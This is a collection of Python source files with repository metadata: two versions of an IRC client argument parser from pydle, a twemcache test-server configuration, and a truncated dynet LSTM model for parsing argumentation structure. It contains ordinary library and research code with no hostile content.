"avg_score": null,
"num_lines": null
} |
## _args.py
# Common argument parsing code.
import argparse
import functools
import logging
import pydle
def client_from_args(name, description, default_nick='Bot', cls=pydle.Client):
    """Build a pydle client and a connect callable from the command line.

    Returns a (client, connect) tuple where client is an instance of cls and
    connect is a zero-argument functools.partial that opens the connection.
    """
    # Parse some arguments.
    parser = argparse.ArgumentParser(name, description=description, add_help=False,
        epilog='This program is part of {package}.'.format(package=pydle.__name__))

    meta = parser.add_argument_group('Meta')
    meta.add_argument('-h', '--help', action='help', help='What you are reading right now.')
    meta.add_argument('-v', '--version', action='version', version='{package}/%(prog)s {ver}'.format(package=pydle.__name__, ver=pydle.__version__), help='Dump version number.')
    meta.add_argument('-V', '--verbose', help='Be verbose in warnings and errors.', action='store_true', default=False)
    meta.add_argument('-d', '--debug', help='Show debug output.', action='store_true', default=False)

    conn = parser.add_argument_group('Connection')
    conn.add_argument('server', help='The server to connect to.', metavar='SERVER')
    conn.add_argument('-p', '--port', help='The port to use. (default: 6667, 6697 (TLS))')
    conn.add_argument('-P', '--password', help='Server password.', metavar='PASS')
    conn.add_argument('--tls', help='Use TLS. (default: no)', action='store_true', default=False)
    conn.add_argument('--verify-tls', help='Verify TLS certificate sent by server. (default: no)', action='store_true', default=False)
    conn.add_argument('-e', '--encoding', help='Connection encoding. (default: UTF-8)', default='utf-8', metavar='ENCODING')

    init = parser.add_argument_group('Initialization')
    init.add_argument('-n', '--nickname', help='Nickname. Can be set multiple times to set fallback nicknames. (default: {})'.format(default_nick), action='append', dest='nicknames', default=[], metavar='NICK')
    init.add_argument('-u', '--username', help='Username. (default: derived from nickname)', metavar='USER')
    init.add_argument('-r', '--realname', help='Realname (GECOS). (default: derived from nickname)', metavar='REAL')
    init.add_argument('-c', '--channel', help='Channel to automatically join. Can be set multiple times for multiple channels.', action='append', dest='channels', default=[], metavar='CHANNEL')

    auth = parser.add_argument_group('Authentication')
    auth.add_argument('--sasl-identity', help='Identity to use for SASL authentication. (default: <empty>)', default='', metavar='SASLIDENT')
    auth.add_argument('--sasl-username', help='Username to use for SASL authentication.', metavar='SASLUSER')
    auth.add_argument('--sasl-password', help='Password to use for SASL authentication.', metavar='SASLPASS')
    auth.add_argument('--sasl-mechanism', help='Mechanism to use for SASL authentication.', metavar='SASLMECH')
    auth.add_argument('--tls-client-cert', help='TLS client certificate to use.', metavar='CERT')
    auth.add_argument('--tls-client-cert-keyfile', help='Keyfile to use for TLS client cert.', metavar='KEYFILE')

    args = parser.parse_args()

    # Set nicknames straight: first one is primary, the rest are fallbacks.
    if not args.nicknames:
        nick = default_nick
        fallback = []
    else:
        nick = args.nicknames.pop(0)
        fallback = args.nicknames

    # Set log level.
    # fix: log_level used to be left unbound when --verbose was given without
    # --debug, which crashed the basicConfig() call below with a NameError.
    if args.debug:
        log_level = logging.DEBUG
    elif args.verbose:
        log_level = logging.WARNING
    else:
        log_level = logging.ERROR
    logging.basicConfig(level=log_level)

    # Setup client and connect.
    client = cls(nickname=nick, fallback_nicknames=fallback, username=args.username, realname=args.realname,
        sasl_identity=args.sasl_identity, sasl_username=args.sasl_username, sasl_password=args.sasl_password, sasl_mechanism=args.sasl_mechanism,
        tls_client_cert=args.tls_client_cert, tls_client_cert_key=args.tls_client_cert_keyfile)
    connect = functools.partial(client.connect,
        hostname=args.server, port=args.port, password=args.password, encoding=args.encoding,
        channels=args.channels, tls=args.tls, tls_verify=args.verify_tls
    )
    return client, connect
| {
"repo_name": "Shizmob/pydle",
"path": "pydle/utils/_args.py",
"copies": "1",
"size": "4050",
"license": "bsd-3-clause",
"hash": 2717457625572672000,
"line_mean": 57.6956521739,
"line_max": 210,
"alpha_frac": 0.6891358025,
"autogenerated": false,
"ratio": 3.7569573283858997,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49460931308858996,
"avg_score": null,
"num_lines": null
} |
## _args.py
# Common argument parsing code.
import argparse
import logging
import pydle
def client_from_args(name, description, default_nick='Bot', cls=pydle.Client):
    """Build a pydle IRC client from command-line arguments and connect it.

    Parses ``sys.argv`` for connection, initialization and authentication
    options, instantiates ``cls`` with them, calls ``connect()`` and
    returns the connected client.

    Parameters
    ----------
    name : str
        Program name passed to argparse (shown in usage/--help).
    description : str
        Program description for --help output.
    default_nick : str, default 'Bot'
        Nickname used when no -n/--nickname option is given.
    cls : type, default pydle.Client
        Client class to instantiate; must accept the keyword arguments
        used below.

    Returns
    -------
    The connected client instance.
    """
    # Parse some arguments.
    parser = argparse.ArgumentParser(name, description=description, add_help=False,
        epilog='This program is part of {package}.'.format(package=pydle.__name__))
    meta = parser.add_argument_group('Meta')
    meta.add_argument('-h', '--help', action='help', help='What you are reading right now.')
    meta.add_argument('-v', '--version', action='version', version='{package}/%(prog)s {ver}'.format(package=pydle.__name__, ver=pydle.__version__), help='Dump version number.')
    meta.add_argument('-V', '--verbose', help='Be verbose in warnings and errors.', action='store_true', default=False)
    meta.add_argument('-d', '--debug', help='Show debug output.', action='store_true', default=False)
    conn = parser.add_argument_group('Connection')
    conn.add_argument('server', help='The server to connect to.', metavar='SERVER')
    conn.add_argument('-p', '--port', help='The port to use. (default: 6667, 6697 (TLS))')
    conn.add_argument('-P', '--password', help='Server password.', metavar='PASS')
    conn.add_argument('--tls', help='Use TLS. (default: no)', action='store_true', default=False)
    conn.add_argument('--verify-tls', help='Verify TLS certificate sent by server. (default: no)', action='store_true', default=False)
    conn.add_argument('-e', '--encoding', help='Connection encoding. (default: UTF-8)', default='utf-8', metavar='ENCODING')
    init = parser.add_argument_group('Initialization')
    init.add_argument('-n', '--nickname', help='Nickname. Can be set multiple times to set fallback nicknames. (default: {})'.format(default_nick), action='append', dest='nicknames', default=[], metavar='NICK')
    init.add_argument('-u', '--username', help='Username. (default: derived from nickname)', metavar='USER')
    init.add_argument('-r', '--realname', help='Realname (GECOS). (default: derived from nickname)', metavar='REAL')
    init.add_argument('-c', '--channel', help='Channel to automatically join. Can be set multiple times for multiple channels.', action='append', dest='channels', default=[], metavar='CHANNEL')
    auth = parser.add_argument_group('Authentication')
    auth.add_argument('--sasl-identity', help='Identity to use for SASL authentication. (default: <empty>)', default='', metavar='SASLIDENT')
    auth.add_argument('--sasl-username', help='Username to use for SASL authentication.', metavar='SASLUSER')
    auth.add_argument('--sasl-password', help='Password to use for SASL authentication.', metavar='SASLPASS')
    auth.add_argument('--tls-client-cert', help='TLS client certificate to use.', metavar='CERT')
    auth.add_argument('--tls-client-cert-keyfile', help='Keyfile to use for TLS client cert.', metavar='KEYFILE')
    auth.add_argument('--nickserv-password', help='NickServ password to identify with.', metavar='NSPASS')
    args = parser.parse_args()
    # Set nicknames straight: the first -n value is the primary nickname,
    # any further ones are fallbacks.
    if not args.nicknames:
        nick = default_nick
        fallback = []
    else:
        nick = args.nicknames.pop(0)
        fallback = args.nicknames
    # Set log level.
    if args.debug:
        log_level = logging.DEBUG
    elif not args.verbose:
        log_level = logging.ERROR
    else:
        # BUG FIX: previously log_level was left unassigned when --verbose
        # was given without --debug, so basicConfig() below raised a
        # NameError. Verbose mode now shows warnings and errors.
        log_level = logging.WARNING
    logging.basicConfig(level=log_level)
    # Setup client and connect.
    client = cls(nickname=nick, fallback_nicknames=fallback, username=args.username, realname=args.realname,
        sasl_identity=args.sasl_identity, sasl_username=args.sasl_username, sasl_password=args.sasl_password,
        tls_client_cert=args.tls_client_cert, tls_client_cert_key=args.tls_client_cert_keyfile,
        nickserv_password=args.nickserv_password)
    client.connect(hostname=args.server, port=args.port, password=args.password, encoding=args.encoding,
        channels=args.channels, tls=args.tls, tls_verify=args.verify_tls)
    return client
| {
"repo_name": "suut/psychic-happiness",
"path": "pydle/utils/_args.py",
"copies": "1",
"size": "3991",
"license": "unlicense",
"hash": 3083694092967911000,
"line_mean": 58.5671641791,
"line_max": 210,
"alpha_frac": 0.6885492358,
"autogenerated": false,
"ratio": 3.7650943396226415,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9923855875245309,
"avg_score": 0.005957540035466526,
"num_lines": 67
} |
# Test-harness configuration for launching a twemcache server instance.
# Maps logical option names (module-level constants below) to the server's
# command-line flags.
# Flags that take no value (presence/absence only).
ARGS_UNARY = {
    'DAEMON':'-d',
    'MAX_CORE':'-r',
    'LOCK_PAGE':'-k',
    'HELP':'-h',
    'LICENSE':'-i',
    'LARGEPAGE':'-L',
    'PREALLOC':'-E',
    'CAS':'-C'
    }
# Flags that take a value.
ARGS_BINARY = {
    'PORT':'-p',
    'UDP':'-U',
    'SOCKET':'-s',
    'ACCESS':'-a',
    'SERVER':'-l',
    'USER':'-u',
    'EVICTION':'-M',
    'MAX_MEMORY':'-m',
    'CONNECTIONS':'-c',
    'VERBOSITY':'-v',
    'PIDFILE':'-P',
    'FACTOR':'-f',
    'ITEM_MIN_SIZE':'-n',
    'DELIMITER':'-D',
    'THREADS':'-t',
    'BACKLOG':'-b',
    'SLAB_SIZE':'-I',
    'AGGR_INTERVAL':'-A',
    'SLAB_PROFILE':'-z'
    }
# Path of the server binary to launch (relative to the build tree).
EXEC = 'src/twemcache'
# Unary arguments
DAEMON = False
MAX_CORE = False
LOCK_PAGE = False
HELP = False
LICENSE = False
LARGEPAGE = False
PREALLOC = False
CAS = False
# Binary arguments (None means: do not pass the flag)
PORT = '11211' # server (TCP) port (-p)
UDP = None
SOCKET = None
ACCESS = None
SERVER = '127.0.0.1' # server IP (-l)
USER = None
EVICTION = 2 # random slab eviction by default
MAX_MEMORY = 4 # max amount memory allocated, in MB (-m)
CONNECTIONS = 256 # max number of concurrent connections allowed (-c)
VERBOSITY = 5 # logging verbosity
PIDFILE = None
FACTOR = None # factor of slab growth (-f)
ITEM_MIN_SIZE = None # item size, smallest (-n)
DELIMITER = None
THREADS = 2 # number of threads (-t)
BACKLOG = 1024
SLAB_SIZE = 1024 * 1024 # (-I)
AGGR_INTERVAL = 100000 # aggregation interval of stats, in milliseconds (-A)
# internals, not used by launching service but useful for data generation
ALIGNMENT = 8 # bytes
ITEM_OVERHEAD = 86 # per-item storage overhead at the server
SLAB_PROFILE = "136,176,216,264,320,392,480,592,736,1024"
# global stats (returns of "stats" command)
STATS_KEYS = [ # system/service info
    'pid', 'uptime', 'time', 'version', 'pointer_size', 'aggregate_ts',
    'rusage_user', 'rusage_system',
    # connection related
    'conn_disabled', 'conn_total', 'conn_struct', 'conn_yield', 'conn_curr',
    # item/slab related
    'item_curr', 'item_free', 'item_acquire', 'item_remove', 'item_evict', 'item_expire',
    'slab_req', 'slab_error', 'slab_alloc', 'slab_curr', 'slab_evict',
    # things in bytes
    'data_read', 'data_written', 'data_curr', 'data_value_curr',
    # time stamps
    'item_expire_ts', 'item_retire_ts', 'item_evict_ts',
    'slab_req_ts', 'slab_error_ts', 'slab_alloc_ts', 'slab_new_ts', 'slab_evict_ts',
    # command related
    'set', 'set_success',
    'add', 'add_exist', 'add_success',
    'replace', 'replace_hit', 'replace_miss', 'replace_success',
    'append', 'append_hit', 'append_miss', 'append_success',
    'prepend', 'prepend_hit', 'prepend_miss', 'prepend_success',
    'delete', 'delete_hit', 'delete_miss',
    'incr', 'incr_hit', 'incr_miss', 'incr_success',
    'decr', 'decr_hit', 'decr_miss', 'decr_success',
    'cas', 'cas_badval', 'cas_hit', 'cas_miss', 'cas_success',
    'get', 'get_hit', 'get_miss',
    'gets', 'gets_hit', 'gets_miss',
    'flush',
    'stats',
    # general errors
    'cmd_error', 'server_error',
    'klog_logged', 'klog_discarded', 'klog_skipped'
    ]
# keys expected from the "stats settings" command
SETTINGS_KEYS = [
    'prealloc', 'lock_page', 'accepting_conns', 'daemonize', 'max_corefile',
    'cas_enabled', 'num_workers', 'reqs_per_event', 'oldest',
    'log_filename', 'verbosity', 'maxconns', 'tcpport', 'udpport', 'inter',
    'domain_socket', 'umask', 'tcp_backlog', 'evictions', 'growth_factor', 'maxbytes',
    'chunk_size', 'slab_size', 'slab_profile', 'username', 'stats_agg_intvl']
# Time to wait before polling stats, in seconds: 1.5x the aggregation
# interval (AGGR_INTERVAL is in microseconds here, hence / 1000000 —
# TODO confirm units against the comment on AGGR_INTERVAL above).
STATS_DELAY = float(AGGR_INTERVAL) * 1.5 / 1000000
| {
"repo_name": "twitter/twemcache",
"path": "tests/config/server/mem4mb.py",
"copies": "3",
"size": "3531",
"license": "bsd-3-clause",
"hash": 6012934092762226,
"line_mean": 31.3944954128,
"line_max": 89,
"alpha_frac": 0.6066270178,
"autogenerated": false,
"ratio": 2.877750611246944,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49843776290469444,
"avg_score": null,
"num_lines": null
} |
"""Argumentation structure RNN using dynet and AD3 inference"""
# Author: Vlad Niculae <vlad@vene.ro>
# License: BSD 3-clause
import warnings
from collections import Counter
from time import time
import numpy as np
import dynet as dy
from sklearn.utils import shuffle
from marseille.struct_models import BaseArgumentMixin
from marseille.inference import loss_augment_unaries
from marseille.custom_logging import logging
from marseille.dynet_utils import (MultiLayerPerceptron, Bilinear,
MultilinearFactored)
class LinkMLP(dy.Saveable):
    """MLP-based argumentation link encoder.

    Scores a (source, target) proposition pair by running a multi-layer
    perceptron over the concatenation of the two representations.
    """
    def __init__(self, n_in, n_hid, n_out, n_layers, model):
        layer_sizes = [2 * n_in] + n_layers * [n_hid] + [n_out]
        self.mlp = MultiLayerPerceptron(layer_sizes, activation=dy.rectify,
                                        model=model)
    def __call__(self, src, trg):
        joint = dy.concatenate([src, trg])
        return self.mlp(joint)
    def get_components(self):
        return [self.mlp]
    def restore_components(self, components):
        (self.mlp,) = components
    def set_dropout(self, dropout):
        self.mlp.dropout = dropout
class LinkBilinear(dy.Saveable):
    """Bilinear argumentation link encoder:
    src_t = MLP_src(src)
    trg_t = MLP_trg(trg)
    return src_t' * W * trg_t + linear and bias terms
    """
    def __init__(self, n_in, n_hid, n_out, n_layers, model):
        # BUG FIX: a trailing comma here previously made `dims` a 1-tuple
        # wrapping the list, i.e. ([n_in, n_hid, ...],), so the MLPs
        # received a tuple instead of the intended list of layer sizes.
        dims = [n_in] + [n_hid] * n_layers
        self.src_mlp = MultiLayerPerceptron(dims, activation=dy.rectify,
                                            model=model)
        self.trg_mlp = MultiLayerPerceptron(dims, activation=dy.rectify,
                                            model=model)
        self.bilinear = Bilinear(n_hid, n_out, model=model)
    def __call__(self, src, trg):
        # Transform both endpoints, then combine with the bilinear form.
        return self.bilinear(
            dy.rectify(self.src_mlp(src)),  # HOTFIX rectify here?
            dy.rectify(self.trg_mlp(trg)))
    def get_components(self):
        # Order must stay in sync with restore_components below.
        return [self.src_mlp, self.trg_mlp, self.bilinear]
    def restore_components(self, components):
        self.src_mlp, self.trg_mlp, self.bilinear = components
    def set_dropout(self, dropout):
        self.src_mlp.dropout = dropout
        self.trg_mlp.dropout = dropout
class SecondOrderMLP(dy.Saveable):
    """Second-order factor encoder using a multi-layer perceptron.

    Scores a triple of proposition representations as
    phi(a, b, c) = MLP([a; b; c]), producing a single scalar.
    """
    def __init__(self, n_in, n_hid, n_layers, model):
        sizes = [3 * n_in] + n_layers * [n_hid] + [1]
        self.mlp = MultiLayerPerceptron(sizes,
                                        activation=dy.rectify,
                                        model=model)
    def __call__(self, a, b, c):
        stacked = dy.concatenate([a, b, c])
        return self.mlp(stacked)
    def get_components(self):
        return [self.mlp]
    def restore_components(self, components):
        (self.mlp,) = components
    def set_dropout(self, dropout):
        self.mlp.dropout = dropout
class SecondOrderMultilinear(dy.Saveable):
    """Second-order factor encoder with a low-rank multilinear term.

    Each of the three inputs is transformed by its own MLP, a constant 1
    is prepended (to provide bias/linear terms), and the three vectors
    are combined through a rank-`n_components` factored tensor:
        w_ijk = sum_r u^(a)_ir u^(b)_jr u^(c)_kr
        phi(a, b, c) = sum_ijk a_i b_j c_k w_ijk
    """
    def __init__(self, n_in, n_hid, n_layers, model, n_components=16):
        mlp_dims = [n_in] + n_layers * [n_hid]
        self.a_mlp = MultiLayerPerceptron(mlp_dims, activation=dy.rectify,
                                          model=model)
        self.b_mlp = MultiLayerPerceptron(mlp_dims, activation=dy.rectify,
                                          model=model)
        self.c_mlp = MultiLayerPerceptron(mlp_dims, activation=dy.rectify,
                                          model=model)
        self.multilinear = MultilinearFactored(n_features=1 + n_hid,
                                               n_inputs=3,
                                               n_components=n_components,
                                               model=model)
    def __call__(self, a, b, c):
        transformed = [dy.rectify(self.a_mlp(a)),  # HOTFIX rectify here?
                       dy.rectify(self.b_mlp(b)),
                       dy.rectify(self.c_mlp(c))]
        # Prepend a constant 1 to each transformed vector.
        augmented = [dy.concatenate([dy.scalarInput(1), v])
                     for v in transformed]
        return self.multilinear(*augmented)
    def get_components(self):
        # Order must stay in sync with restore_components below.
        return [self.a_mlp, self.b_mlp, self.c_mlp, self.multilinear]
    def restore_components(self, components):
        self.a_mlp, self.b_mlp, self.c_mlp, self.multilinear = components
    def set_dropout(self, dropout):
        self.a_mlp.dropout = dropout
        self.b_mlp.dropout = dropout
        self.c_mlp.dropout = dropout
class ArgumentLSTM(BaseArgumentMixin):
    """Argumentation parser using LSTM features and structured hinge loss.
    Parameters
    ----------
    max_iter: int, default: 100
        Total number of iterations (epochs) to perform.
    score_at_iter: list or None, default: None
        Number of iterations after which to compute scores on validation data.
    n_embed: int, default: 128
        Embedding size. Ignored if existing embeddings passed to `embeds`.
    lstm_layers: int, default: 2
        Number of LSTM layers to use.
    prop_mlp_layers: int, default: 2
        Number of layers in proposition MLP encoder.
    link_mlp_layers: int, default: 1
        Number of layers in link encoder (either as MLP or as preprocessing
        before the bilinear calculation.)
    link_bilinear: bool, default: True
        Whether to use bilinear model for encoding link potentials.
    n_lstm: int, default: 128
        LSTM hidden layer size. (Must be even: is split into forward and
        backward LSTMs equally.)
    n_mlp: int, default: 128
        Hidden layer size across all MLPs.
    lstm_dropout: float, default 0
        Amount of LSTM dropout. Might be buggy in dynet at the moment.
    mlp_dropout: float, default: 0.1
        Amount of dropout to apply across all MLPs in the model.
    embeds: tuple or None, default: None
        Tuple of (embed_data, embed_vocab) for GloVe initialization
    class_weight: "balanced" or None, default: "balanced"
        Scaling for the negative link class cost. Does not influence
        proposition loss.
    exact_inference: bool, default: False
        Whether to use branch & bound at every iteration to get exact
        solutions. Can be very slow.
    compat_features: bool, default: False
        Whether to use structural features to parametrize the compatibility
        factors. Documents should be preprocessed accordingly.
    constraints: {"ukp"|"ukp+strict"|"cdcp"|"cdcp+strict"|None}, default: None
        What kind of constraints to apply in decoding.
    second_order_multilinear: bool, default: True
        Whether to use low-rank multilinear encoder for second order
        potentials (only used if at least one of
        (coparent|grandparent|sibling)_layers is nonzero.
    coparent_layers: int, default: 0
        Number of layers to use in coparent potential encoding. If 0,
        coparents are not used.
    grandparent_layers: int, default: 0
        Number of layers to use in grandparent potential encoding. If 0,
        grandparent are not used.
    sibling_layers: int, default: 0
        Number of layers to use in sibling potential encoding. If 0,
        sibling are not used.
    multilinear_rank: int, default: 16
        Rank of the third-order tensor for coparent, grandparent and sibling
        potentials. Only used if at least one of such potentials is on, and if
        `second_order_multilinear=True`.
    """
    # NOTE(review): the docstring above documents `multilinear_rank`, but
    # __init__ takes no such parameter (SecondOrderMultilinear keeps its
    # own n_components default), and `class_weight` actually defaults to
    # None here, not "balanced" — confirm which side is intended.
    def __init__(self, max_iter=100, score_at_iter=None, n_embed=128,
                 lstm_layers=2, prop_mlp_layers=2, link_mlp_layers=1,
                 link_bilinear=True, n_lstm=128, n_mlp=128,
                 lstm_dropout=0.0, mlp_dropout=0.1, embeds=None,
                 class_weight=None, exact_inference=False,
                 compat_features=False, constraints=None,
                 second_order_multilinear=True, coparent_layers=0,
                 grandparent_layers=0, sibling_layers=0,
                 exact_test=False):
        self.max_iter = max_iter
        self.score_at_iter = score_at_iter
        self.n_embed = n_embed
        self.lstm_layers = lstm_layers
        self.prop_mlp_layers = prop_mlp_layers
        self.link_mlp_layers = link_mlp_layers
        self.link_bilinear = link_bilinear
        self.n_lstm = n_lstm
        self.n_mlp = n_mlp
        self.lstm_dropout = lstm_dropout
        self.mlp_dropout = mlp_dropout
        self.embeds = embeds
        self.class_weight = class_weight
        self.exact_inference = exact_inference
        self.compat_features = compat_features
        self.constraints = constraints
        self.second_order_multilinear = second_order_multilinear
        self.coparent_layers = coparent_layers
        self.grandparent_layers = grandparent_layers
        self.sibling_layers = sibling_layers
        self.exact_test = exact_test
    # Build the token vocabulary: an __UNK__ slot plus every word whose
    # document frequency is greater than 1 (sorted for determinism).
    def build_vocab(self, docs):
        special_toks = ["__UNK__"]
        word_df = Counter(tok for doc in docs for tok in set(doc.tokens()))
        vocab = special_toks + [w for w, df in sorted(word_df.items())
                                if df > 1]
        inv_vocab = {word: k for k, word in enumerate(vocab)}
        self.UNK = inv_vocab["__UNK__"]
        self.inv_vocab = inv_vocab
        self.vocab = vocab
    # Create the dynet model, the Adam trainer and all network parameters
    # (embeddings, BiLSTM, proposition/link/compat/second-order scorers).
    # Requires build_vocab and initialize_labels to have run first.
    def init_params(self):
        self.model = dy.Model()
        self._trainer = dy.AdamTrainer(self.model)
        if self.embeds is not None:
            # When pretrained embeddings are given, their width overrides
            # the configured n_embed.
            sz = self.embeds[1].shape[1]
            self.n_embed = sz
            logging.info("Overriding n_embeds to glove size {}".format(sz))
        self._embed = self.model.add_lookup_parameters((len(self.vocab),
                                                        self.n_embed))
        if self.embeds is not None: # initialize embeddings with glove
            logging.info("Initializing embeddings...")
            embed_vocab, embed_data = self.embeds
            inv_embed = {w: k for k, w in enumerate(embed_vocab)}
            for k, w in enumerate(self.vocab):
                if w in inv_embed:
                    self._embed.init_row(k, embed_data[inv_embed[w]])
            logging.info("...done")
        self._rnn = dy.BiRNNBuilder(self.lstm_layers, self.n_embed,
                                    self.n_lstm, self.model, dy.LSTMBuilder)
        # proposition classifier MLP
        self._prop_mlp = MultiLayerPerceptron(
            [self.n_lstm] +
            [self.n_mlp] * self.prop_mlp_layers +
            [self.n_prop_states],
            activation=dy.rectify,
            model=self.model)
        # link classifier MLP (possibly bilinear)
        LinkEncoder = LinkBilinear if self.link_bilinear else LinkMLP
        self._link = LinkEncoder(self.n_lstm, self.n_mlp, self.n_link_states,
                                 self.link_mlp_layers, self.model)
        # compatibility (trigram) factors, optionally with features
        n_compat = self.n_prop_states ** 2 * self.n_link_states
        if self.compat_features:
            n_compat *= self.n_compat_features
        self._compat = self.model.add_parameters(n_compat,
                                                 init=dy.ConstInitializer(0))
        # optional second-order scorers
        SecondOrderEncoder = (SecondOrderMultilinear
                              if self.second_order_multilinear
                              else SecondOrderMLP)
        if self.coparent_layers: # scorer for a -> b <- c
            self._coparent = SecondOrderEncoder(self.n_lstm, self.n_mlp,
                                                self.coparent_layers,
                                                self.model)
        if self.grandparent_layers: # scorer for a -> b -> c
            self._grandparent = SecondOrderEncoder(self.n_lstm, self.n_mlp,
                                                   self.grandparent_layers,
                                                   self.model)
        if self.sibling_layers: # scorer for a <- b -> c
            self._sibling = SecondOrderEncoder(self.n_lstm, self.n_mlp,
                                               self.sibling_layers,
                                               self.model)
    # Pickle only the plain hyperparameters: drop the dynet model and
    # every underscore-prefixed parameter attribute.
    def __getstate__(self):
        return {k: v for k, v in self.__dict__.items()
                if k != 'model' and k[0] != '_'}
    # Persist all dynet parameters. The ordering here must stay in sync
    # with load() below.
    def save(self, filename):
        params = [self._compat, self._embed, self._rnn, self._prop_mlp,
                  self._link]
        if self.coparent_layers:
            params.extend([self._coparent])
        if self.grandparent_layers:
            params.extend([self._grandparent])
        if self.sibling_layers:
            params.extend([self._sibling])
        self.model.save(filename, params)
    # Rebuild the parameter objects, then overwrite them with the saved
    # values in the exact order save() wrote them.
    def load(self, filename):
        self.init_params()
        saved = self.model.load(filename)
        (self._compat, self._embed, self._rnn, self._prop_mlp,
         self._link) = saved[:5]
        saved = saved[5:]
        saved.reverse() # so we can just pop
        if self.coparent_layers:
            self._coparent = saved.pop()
        if self.grandparent_layers:
            self._grandparent = saved.pop()
        if self.sibling_layers:
            self._sibling = saved.pop()
        assert len(saved) == 0
    # Build the dynet computation graph for one document and return dynet
    # expressions for all factor potentials (propositions, links, compat
    # weights, and any enabled second-order factors).
    def build_cg(self, doc, training=True):
        dy.renew_cg()
        # dropout
        if training:
            self._rnn.set_dropout(self.lstm_dropout)
            drop = self.mlp_dropout
        else:
            self._rnn.disable_dropout()
            drop = 0
        self._prop_mlp.dropout = drop
        self._link.set_dropout(drop)
        if self.sibling_layers:
            self._sibling.set_dropout(drop)
        if self.grandparent_layers:
            self._grandparent.set_dropout(drop)
        if self.coparent_layers:
            self._coparent.set_dropout(drop)
        # lookup token embeddings
        tok_ids = (self.inv_vocab.get(tok, self.UNK) for tok in doc.tokens())
        embeds = [dy.lookup(self._embed, tok) for tok in tok_ids]
        # pass through bidi LSTM
        rnn_out = self._rnn.transduce(embeds)
        # map character offsets to token offsets
        tok_offset = np.array(doc.tokens(key='characterOffsetBegin',
                                         lower=False))
        # get an average representation for each proposition
        prop_repr = []
        prop_potentials = []
        link_potentials = []
        coparent_potentials = []
        grandparent_potentials = []
        sibling_potentials = []
        for offset in doc.prop_offsets:
            # offset is presumably a (begin, end) character pair; searchsorted
            # maps it onto token indices — TODO confirm against doc type.
            start, end = np.searchsorted(tok_offset, offset)
            prop = dy.average(rnn_out[start:end])
            prop_potentials.append(self._prop_mlp(prop))
            prop_repr.append(prop)
        for src, trg in doc.link_to_prop:
            link_potentials.append(self._link(prop_repr[src], prop_repr[trg]))
        # optional second order factor scores
        any_second_order = (self.coparent_layers or
                            self.grandparent_layers or
                            self.sibling_layers)
        if any_second_order:
            for a, b, c in doc.second_order:
                x = (prop_repr[a], prop_repr[b], prop_repr[c])
                if self.coparent_layers:
                    coparent_potentials.append(self._coparent(*x))
                if self.grandparent_layers:
                    grandparent_potentials.append(self._grandparent(*x))
                if self.sibling_layers:
                    sibling_potentials.append(self._sibling(*x))
        compat = dy.parameter(self._compat)
        return (prop_potentials,
                link_potentials,
                compat,
                coparent_potentials,
                grandparent_potentials,
                sibling_potentials)
    # Evaluate the dynet expressions from build_cg into numpy arrays /
    # lists, shaped the way the inference code expects.
    def _get_potentials(self, doc, dy_potentials):
        props, links, compat, coparents, grandpas, siblings = dy_potentials
        prop_potentials = dy.concatenate_cols(props)
        prop_potentials = prop_potentials.value().astype(np.double).T
        link_potentials = dy.concatenate_cols(links)
        link_potentials = link_potentials.value().astype(np.double).T
        if self.compat_features:
            # With features, the compat weights form a matrix applied to
            # each document's structural feature vector.
            w_compat = compat.npvalue().reshape(self.n_compat_features, -1)
            compat_potentials = (np.dot(doc.compat_features, w_compat)
                                 .reshape(-1,
                                          self.n_prop_states,
                                          self.n_prop_states,
                                          self.n_link_states))
        else:
            compat_potentials = compat.npvalue().reshape(self.n_prop_states,
                                                         self.n_prop_states,
                                                         self.n_link_states)
        coparent_potentials = (dy.concatenate(coparents).value()
                               if coparents else [])
        grandparent_potentials = (dy.concatenate(grandpas).value()
                                  if grandpas else [])
        sibling_potentials = (dy.concatenate(siblings).value()
                              if siblings else [])
        return (prop_potentials, link_potentials, compat_potentials,
                coparent_potentials, grandparent_potentials,
                sibling_potentials)
    # Structured hinge loss for one document: run loss-augmented inference,
    # then build the dynet objective from the difference between predicted
    # (fractional) and true (rounded) marginals.
    def _doc_loss(self, doc, y):
        dy_potentials = self.build_cg(doc)
        potentials = self._get_potentials(doc, dy_potentials)
        # unpack all potentials
        (dy_prop_potentials,
         dy_link_potentials,
         dy_compat_potentials,
         dy_coparent_potentials,
         dy_grandparent_potentials,
         dy_sibling_potentials) = dy_potentials
        (prop_potentials,
         link_potentials,
         compat_potentials,
         coparent_potentials,
         grandparent_potentials,
         sibling_potentials) = potentials
        y_prop = self.prop_encoder_.transform(y.nodes)
        y_link = self.link_encoder_.transform(y.links)
        # Augment the unary scores in place with the (class-weighted)
        # Hamming cost before inference.
        loss_augment_unaries(prop_potentials, y_prop, self.prop_cw_)
        loss_augment_unaries(link_potentials, y_link, self.link_cw_)
        y_hat, status = self._inference(doc, potentials, relaxed=True,
                                        exact=self.exact_inference,
                                        constraints=self.constraints)
        (prop_marg,
         link_marg,
         compat_marg,
         second_order_marg) = self._marg_fractional(doc, y_hat)
        (Y_prop,
         Y_link,
         compat_true,
         second_order_true) = self._marg_rounded(doc, y)
        # proposition loss
        prop_ix = np.arange(len(y_prop))
        prop_cws = self.prop_cw_[y_prop]
        prop_hamm = prop_cws * (1 - prop_marg[prop_ix, y_prop])
        diffs = prop_marg - Y_prop
        # Only terms with a nonzero Hamming contribution enter the
        # objective.
        obj_prop = [dy.dot_product(prop, dy.inputVector(diff))
                    for prop, diff, hamm
                    in zip(dy_prop_potentials, diffs, prop_hamm)
                    if hamm > 1e-9]
        # link loss
        link_ix = np.arange(len(y_link))
        link_cws = self.link_cw_[y_link]
        link_hamm = link_cws * (1 - link_marg[link_ix, y_link])
        diffs = link_marg - Y_link
        obj_link = [dy.dot_product(link, dy.inputVector(diff))
                    for link, diff, hamm
                    in zip(dy_link_potentials, diffs, link_hamm)
                    if hamm > 1e-9]
        hamming_loss = prop_hamm.sum() + link_hamm.sum()
        max_hamming_loss = prop_cws.sum() + link_cws.sum()
        obj = obj_prop + obj_link
        # append compat objective
        compat_diff = (compat_marg - compat_true).ravel()
        compat_obj = dy.dot_product(dy_compat_potentials,
                                    dy.inputVector(compat_diff))
        obj.append(compat_obj)
        # append second order objective
        second_order_potentials = (dy_coparent_potentials +
                                   dy_grandparent_potentials +
                                   dy_sibling_potentials)
        if second_order_potentials:
            second_order_potentials = dy.concatenate(second_order_potentials)
            second_order_diff = second_order_marg - second_order_true
            second_order_obj = dy.dot_product(
